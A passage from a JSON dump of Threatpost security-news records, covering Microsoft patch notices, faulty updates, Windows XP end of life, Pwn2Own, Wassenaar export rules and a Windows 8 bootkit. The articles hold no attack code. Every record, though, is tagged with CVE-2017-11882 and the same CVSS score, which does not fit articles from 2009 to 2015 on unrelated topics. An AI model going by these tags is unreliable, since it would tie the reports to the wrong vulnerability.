delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client side OS back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). 
The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high complexity vulnerabilities, Microsoft said.\n\nThird-party applications such as media players or Web components such as Flash or Java continue to thrive, with disclosures up 34.4 percent in the latter half of 2013 and accounting for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. 
Browser bugs, meanwhile, were also down 28 percent and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:25", "description": "Microsoft has withdrawn a recent patch for Outlook 2007 after it caused slow performance and problems with third party e-mail services. 
Microsoft withdrew a software update [released last week](<https://threatpost.com/microsoft-closes-door-stuxnet-december-patch-121410/>) after reports that the update, to its Outlook 2007 e-mail product, was causing problems for customers connecting to third party e-mail products. \n\nThe company has withdrawn the update [KB2412171](<http://support.microsoft.com/kb/2412171>) from its Microsoft Update service, [according to a blog post](<http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx>). Microsoft recommends that customers who have installed it and encountered problems uninstall the patch.\n\nUsers began reporting problems with the Outlook 2007 update soon after it was released on December 14. Among other things, customers reported severe slowdowns in the Outlook 2007 application when moving between mail folders or clicking on Calendar or Task links. \n\nCustomers who used Outlook to send and receive messages from e-mail servers that were not running Microsoft\u2019s Exchange e-mail server software, including Gmail and Windows Live Hotmail, were affected. In addition, the update prevented Gmail users from connecting to Gmail\u2019s mail servers if the Outlook Secure Password Authentication (SPA) option was enabled, and broke Auto Archiving for IMAP, POP3 and Outlook Live Connector Accounts that were managed using Outlook, if no Exchange Server account was configured in the same Outlook profile, Microsoft said. \n\nMicrosoft apologized for the disruption and has provided instructions for removing the update while the company investigates the performance issues. 
\n", "cvss3": {}, "published": "2010-12-21T17:21:16", "type": "threatpost", "title": "Microsoft Withdraws Outlook Update After Gmail Conflicts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:28", "id": "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "href": "https://threatpost.com/microsoft-withdraws-outlook-update-after-gmail-conflicts-122110/74796/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. [Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday and until now, most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched 
vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. Yet the fact remains whatever XP systems remain in circulation after tomorrow will be exposed and that brings up questions, such as: How will white or gray hats respond? For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publicly disclose their research because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. 
\u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. \u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. 
Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as a pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. 
I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. 
This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:54", "description": "The [Pwn2Own contest at the CanSecWest](<https://threatpost.com/why-pwn2own-whats-right-security-030911/>) conference has become one of the landmark events on the calendar each year, as researchers gather with nervous vendors in a tiny room to see who can own which browser on which platform and how quickly. 
But this year\u2019s contest will have a much different look than past editions, with participants vying for more than $100,000 in cash by amassing points over the course of three days.\n\nThe new format will include the assignment of point values for each of the various targets in the contest, which typically are browsers such as Internet Explorer, Firefox and Chrome running on Mac OS X or Windows machines. In order to win the contest, a participant must have at least one zero-day vulnerability in one of the targets. Each successful compromise of a target with a zero-day will be worth 32 points, and unlike in past years, targets will not be removed from the competition once they\u2019ve been successfully compromised by one researcher.\n\nAlso, on the first day of the contest, the organizers from HP\u2019s TippingPoint Zero Day Initiative will announce two previously patched vulnerabilities that contestants can use on each target. They will then have three days to write an exploit that works on a given target, although the points awarded for a win will decrease each day. A win on the first day earns 10 points, nine points on the second day and eight on the third. For those \u201cpublic vulnerabilities\u201d, there won\u2019t be any requirement for a sandbox escape or bypass of protected mode in the browsers.\n\nThe changes are the result of a review of past years\u2019 contests and a desire to make the event fairer for everyone involved. In past years, there was a drawing to see which participant would go first on each target, and once it was successfully compromised, it was off the table for everyone else. There also will be first, second and third places this year, with cash rewards of $60,000, $30,000 and $15,000, respectively. The three researchers with the highest point totals at the end of the three-day contest will win the money.\n\n\u201cWe basically rearchitected the entire thing this year. 
We wanted to take our limited budget and spread it over three winners in order to give them more incentive to bring their vulns to Pwn2Own,\u201d said Aaron Portnoy, the manager of the security research team at TippingPoint. \u201cWe didn\u2019t think it was fair with the drawing. That opens the door for people having a vulnerability they don\u2019t use at the contest and it doesn\u2019t get fixed.\u201d\n\nIn addition to the main cash prizes, contestants also win the laptops on which they\u2019re able to successfully compromise targets. And this year, Google is putting up a prize of $20,000 for every unique set of bugs that can compromise its Chrome browser, without any platform-specific bugs. In order to claim the prize, a participant will have to get full code execution outside of Chrome\u2019s sandbox, but there is no limit to the number of those rewards a researcher can win. So if one participant has three or four of those in his pocket\u2013which seems unlikely\u2013he could earn a serious payday.\n\nGoogle also will pay $10,000 for Chrome vulnerabilities that get code execution outside of the sandbox but also require some OS-specific vulnerability to work, Portnoy said.\n\nThe idea behind all of the changes in this year\u2019s Pwn2Own is to bring the contest closer to the way it was when it began several years ago. The contest also has dropped mobile devices such as iPhones and Android phones as targets.\n\n\u201cWe\u2019re going back to the roots of Pwn2Own,\u201d Portnoy said. \u201cThe mobile platforms have been a barrier to entry. We expect to see more competitors.\u201d\n\nAll of the new vulnerabilities used in the [Pwn2Own contest](<http://pwn2own.zerodayinitiative.com/>) each year are immediately disclosed to the affected vendors as part of the rules of engagement. 
The inclusion of the known vulnerabilities in target platforms is a way to test the exploit-writing skills of the researchers, as well as drawing attention to the need for people to patch older bugs.\n\n\u201cWe want to show the importance of patching and want to show that the contest will have active participation over three days,\u201d Portnoy said. \u201cWe want people to watch.\u201d\n\nPortnoy said the list of targets for this year\u2019s contest would be available soon. [CanSecWest](<http://cansecwest.com/index.html>) is March 7-9 this year in Vancouver.\n", "cvss3": {}, "published": "2012-01-23T20:00:06", "type": "threatpost", "title": "Revamped Pwn2Own to Offer $105K in Prizes, Cash From Google for Chrome 0-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:57", "id": "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "href": "https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/76128/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "Microsoft announced Wednesday it will tweak the release of its forthcoming Windows 8 operating system to comply with the European Commission, which argues that in its current state, the software fails to offer customers a browser choice screen to let them \u201ceasily choose their preferred web browser.\u201d\n\nThe browser choice issue was also present in Windows 7 and according to the European Union antitrust commissioner Joaquin Almunia this morning, the EU has been in contact with Microsoft to ensure it doesn\u2019t repeat the same mistake.\n\nAccording to reports, Microsoft was advised to remedy the issue \u201cif they don\u2019t want to take the risk of a new investigation,\u201d Almunia [warned at a press conference earlier 
today](<http://www.google.com/hostednews/afp/article/ALeqM5iXITc3iybCliakA7TZ496XmzPS5g?docId=CNG.8bb0ab94569c4cff3a09e64804358eaa.441>).\n\nThe EU initially took issue that Microsoft\u2019s Windows 7 Service Pack 1, released in February 2011, failed to offer users a choice, something the company has been legally bound to do in Europe since December 2009. After that ruling, the EU mandated that Microsoft display a choice screen to \u201caddress competition concerns.\u201d While the choice screen popped up in March 2010 as part of a five year agreement, from February 2011 to July 2012, the \u201cchoice screen\u201d disappeared from Windows.\n\n\u201cIf infringements are confirmed, Microsoft should expect sanctions,\u201d [Almunia warned in July](<http://europa.eu/rapid/press-release_IP-12-800_en.htm?locale=en>), when proceedings against Microsoft over the most recent issue were opened.\n\nMicrosoft claimed the lack of a \u201cchoice screen\u201d was due to a technical error and claims it has taken steps to ensure the problem doesn\u2019t happen again. It will implement changes to Windows 8 before its release later this week, [the company acknowledged in a press release today](<http://www.microsoft.com/en-us/news/Press/2012/Oct12/10-24statement.aspx>).\n\nIn the U.S., Windows 8 is slated for release on Friday, while a tweaked version, Windows 8 Pro N, will be released in Europe without Windows Media Player. Similar to the browser choice ruling, the EU ruled in 2004\u2019s \u201cMicrosoft competition case\u201d that tying the player to Windows was an \u201cabuse of a dominant position.\u201d In response, Microsoft had to release a version of its Windows software [with its flagship media player stripped out](<http://www.law.yale.edu/documents/pdf/The_Economists_Voice.pdf>). 
(.PDF)\n\nThe EU is known for taking a tougher stance toward user privacy than the U.S., along with enforcing its competition law \u2014 a law that is effectively the equivalent of the U.S.\u2019s antitrust law. The commission fined Microsoft twice, [in 2004 and 2008](<http://news.bbc.co.uk/2/hi/business/7266629.stm>) after it determined it had gained unfair market advantage with its Windows platform. \n", "cvss3": {}, "published": "2012-10-24T19:01:05", "type": "threatpost", "title": "Microsoft Agrees to Modify Windows 8 Following EU Complaint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "href": "https://threatpost.com/microsoft-agrees-modify-windows-8-following-eu-complaint-102412/77151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. 
Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic & International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily, Goodwin claimed.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. 
Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. 
Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe & Johnson LLP, said during the panel. 
Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "description": "Problems with [a security update issued this week by Microsoft](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>) have surfaced on a number of technology forums.\n\nWindows users say [Microsoft Security Advisory 303929](<https://technet.microsoft.com/en-us/library/security/3033929.aspx>), which adds SHA-2 code-signing and verification support for Windows 7 client machines and Windows Server 2008 R2 boxes, is causing computers to enter into an infinite loop.\n\nA request for comment from Microsoft was not returned in time for publication. 
It is not clear whether or when Microsoft will pull the update back for repairs as it has with other [faulty](<https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>) [patches](<https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>).\n\n\u201cAfter installation the PC reboots, but during the boot up configuration of the patch it fails and Windows starts, reverting the configuration and reboots,\u201d said one poster on a Microsoft-sponsored [Windows forum](<http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/kb3033929-fails-to-install-and-cause-a-minor/4c56d5d5-a66c-4865-8ccb-d36f7c314c33>). \u201cAnd then it starts all over again a couple of times until it eventually boots into Windows.\u201d\n\nNine others on that one forum posted a reply noting the same problem almost verbatim.\n\nTuesday\u2019s update supersedes a similar update from October and addresses issues that customers had with that installation, Microsoft said. Windows 8, 8.1, RT, RT 8.1, Windows Server 2012 and Windows Server 2012 R2 already have SHA-2 support built in. Windows Server 2003, Vista and Windows Server 2008 will not receive similar support, Microsoft said.\n\nThe SHA-1 algorithm has long been considered weak, obsolete and dangerous to deploy, with [collision attacks against it considered practical by 2018](<threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Microsoft itself formally recommended that [developers stop using SHA-1](<https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) two years ago, and deprecate other weak crypto such as RC4. By January, Microsoft developers will no longer be allowed to use SHA-1 in code signing or developer certs.\n\nBrowser makers such as Mozilla and Google have also shunned the use of SHA-1. 
Mozilla, last September, [formally asked Certificate Authorities and websites to upgrade certificates to SHA-256, SHA-384 or SHA-512](<https://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>), all exponentially stronger mathematically than SHA-1, and announced that SHA-1 should not be trusted after Jan. 1, 2017.\n\nGoogle, meanwhile, [phased out SHA-1 usage in its Chrome](<https://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>) browser starting last November with Chrome 40. Since then, Chrome no longer fully trusts sites whose certificate chains include SHA-1 and extend beyond Jan. 1, 2017. Sites with SHA-1 certificates extending beyond that date will be trusted, but Chrome will note that they have \u201cminor errors.\u201d Starting with Chrome 40, sites with certificate chains including SHA-1 which extend beyond Jan. 1, 2017 will be marked with a blank white sheet, the current visual display for \u201cneutral, lacking security.\u201d Chrome 41 will treat such sites as \u201caffirmatively insecure,\u201d a state indicated by a padlock with a red X on top of it and a red strike through the text that says HTTPS.\n", "cvss3": {}, "published": "2015-03-12T10:16:57", "type": "threatpost", "title": "Microsoft SHA-2 Advisory Causing 'Infinite Loop' Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-12T14:16:57", "id": "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "href": "https://threatpost.com/microsoft-sha-2-advisory-causing-infinite-loop-issues/111597/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:21", "description": "A security researcher who has in the past created low-level rootkits capable of staying resident on an infected machine after reboots said he has now accomplished the same feat on Windows 8, which hasn\u2019t even hit the shelves yet. 
Peter Kleissner said he has created a new version of his Stoned bootkit that defeats the pre-boot security checks included in the forthcoming OS and survives reboots.\n\nKleissner is known in the security community for his creation of the [Stoned bootkit](<http://www.stoned-vienna.com/>), a sophisticated form of rootkit that is designed to load from the master boot record and stay resident in memory throughout the boot process. The previous version of the bootkit was designed to work on Windows XP through Windows 7, but the new one that Kleissner has written also works on Windows 8. He said in a message on Twitter Thursday that Stoned Lite is a small footprint bootkit that can be loaded from either a USB stick or a CD.\n\nHe said he may also add some other functionality to the software in the near future.\n\n\u201cMight add in-memory patching of msv1_0!MsvpPasswordValidate, so it allows to log on with any password.. nothing new but nice and fancy,\u201d Kleissner said in a later Twitter message.\n\nThe pre-boot security mechanisms in Windows 8 have drawn a lot of scrutiny in recent months, particularly the fact that [Microsoft is implementing a version of 